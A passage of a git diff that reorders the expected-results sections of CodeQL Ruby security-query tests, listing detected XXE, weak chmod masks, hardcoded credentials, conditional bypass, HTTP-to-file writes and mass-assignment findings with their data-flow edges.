guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:11:26:11:32 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| LibXmlRuby.rb:12:24:12:30 | content | LibXmlRuby.rb:3:15:3:20 | call to params | LibXmlRuby.rb:12:24:12:30 | content | XML parsing depends on a $@ without guarding against external entity expansion. | LibXmlRuby.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:5:26:5:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:5:26:5:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:6:26:6:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:6:26:6:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:7:26:7:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:7:26:7:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:8:26:8:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:8:26:8:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:9:26:9:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:9:26:9:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:11:26:11:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:11:26:11:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:12:26:12:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:12:26:12:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:15:26:15:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:15:26:15:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:16:26:16:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:16:26:16:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:18:26:18:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:18:26:18:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:19:26:19:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:19:26:19:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:22:26:22:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:22:26:22:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:25:26:25:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:25:26:25:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. 
| Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:27:26:27:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:27:26:27:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | +| Nokogiri.rb:28:26:28:32 | content | Nokogiri.rb:3:15:3:20 | call to params | Nokogiri.rb:28:26:28:32 | content | XML parsing depends on a $@ without guarding against external entity expansion. | Nokogiri.rb:3:15:3:20 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected index f56d7886c572..802e76f63a50 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected +++ b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.expected 
@@ -1,15 +1,3 @@ -#select -| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | -| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | -| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | -| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | -| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | -| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. 
| FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | -| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | -| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | -| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | -| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | edges | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:53:19:53:22 | perm | provenance | | | FilePermissions.rb:51:3:51:6 | perm : Integer | FilePermissions.rb:54:3:54:7 | perm2 : Integer | provenance | | 
@@ -37,3 +25,15 @@ nodes | FilePermissions.rb:67:19:67:24 | "a+rw" | semmle.label | "a+rw" | | FilePermissions.rb:72:21:72:24 | 0755 | semmle.label | 0755 | subpaths +#select +| FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | FilePermissions.rb:5:19:5:22 | 0222 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:5:3:5:32 | call to chmod | call to chmod | +| FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | FilePermissions.rb:7:19:7:22 | 0622 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:7:3:7:32 | call to chmod | call to chmod | +| FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | FilePermissions.rb:9:19:9:22 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:9:3:9:32 | call to chmod | call to chmod | +| FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | FilePermissions.rb:11:19:11:22 | 0777 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:11:3:11:32 | call to chmod | call to chmod | +| FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | FilePermissions.rb:28:13:28:16 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:28:3:28:26 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:53:19:53:22 | perm | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:53:3:53:32 | call to chmod | call to chmod | +| FilePermissions.rb:51:10:51:13 | 0777 | FilePermissions.rb:51:10:51:13 | 0777 : Integer | FilePermissions.rb:56:19:56:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. 
| FilePermissions.rb:56:3:56:33 | call to chmod | call to chmod | +| FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" | FilePermissions.rb:58:10:58:26 | "u=wrx,g=rwx,o=x" : String | FilePermissions.rb:61:19:61:23 | perm2 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:61:3:61:33 | call to chmod | call to chmod | +| FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | FilePermissions.rb:63:19:63:29 | "u=rwx,o+r" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:63:3:63:39 | call to chmod | call to chmod | +| FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | FilePermissions.rb:67:19:67:24 | "a+rw" | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:67:3:67:34 | call to chmod | call to chmod | +| FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | FilePermissions.rb:72:21:72:24 | 0755 | This overly permissive mask used in $@ allows read or write access to others. | FilePermissions.rb:72:3:72:34 | call to chmod_R | call to chmod_R | diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected index 4f03b055ad10..a3f4ecb3ae9b 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected 
@@ -1,15 +1,3 @@ -#select -| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | -| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | -| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | -| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." | HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. 
| HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | -| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | -| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | edges | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | provenance | | | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | provenance | | 
@@ -53,3 +41,15 @@ nodes | HardcodedCredentials.rb:43:46:43:53 | password | semmle.label | password | | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | semmle.label | "abcdef123456" : String | subpaths +#select +| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | +| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | +| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | +| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." 
| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | +| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | +| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected index fb60e7239398..897e8276049f 100644 
--- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected @@ -1,7 +1,3 @@ -#select -| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | -| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | -| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | edges | ConditionalBypass.rb:3:5:3:9 | check | ConditionalBypass.rb:6:8:6:12 | check | provenance | | | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:3:13:3:26 | ...[...] | provenance | | 
@@ -24,3 +20,7 @@ nodes | ConditionalBypass.rb:25:10:25:22 | ...[...] | semmle.label | ...[...] | | ConditionalBypass.rb:27:8:27:8 | p | semmle.label | p | subpaths +#select +| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | +| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | +| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected index 11975de723a3..792b17303b10 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected +++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected 
@@ -1,6 +1,3 @@ -#select -| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | -| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | edges | http_to_file_access.rb:3:1:3:4 | resp | http_to_file_access.rb:5:12:5:15 | resp | provenance | | | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:3:1:3:4 | resp | provenance | | @@ -16,3 +13,6 @@ nodes | http_to_file_access.rb:9:16:9:30 | ...[...] | semmle.label | ...[...] | | http_to_file_access.rb:11:18:11:23 | script | semmle.label | script | subpaths +#select +| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | +| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | diff --git a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected index f859557ffde6..3b23376ac8d1 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected +++ b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected 
@@ -1,25 +1,3 @@ -#select -| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | -| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | -| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:52:18:52:23 | call to params | this remote flow source | -| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:53:18:53:23 | call to params | this remote flow source | edges | test.rb:43:9:43:14 | call to params | test.rb:43:9:43:29 | call to require | provenance | | | test.rb:43:9:43:29 | call to require | test.rb:43:9:43:37 | call to permit! | provenance | Config | 
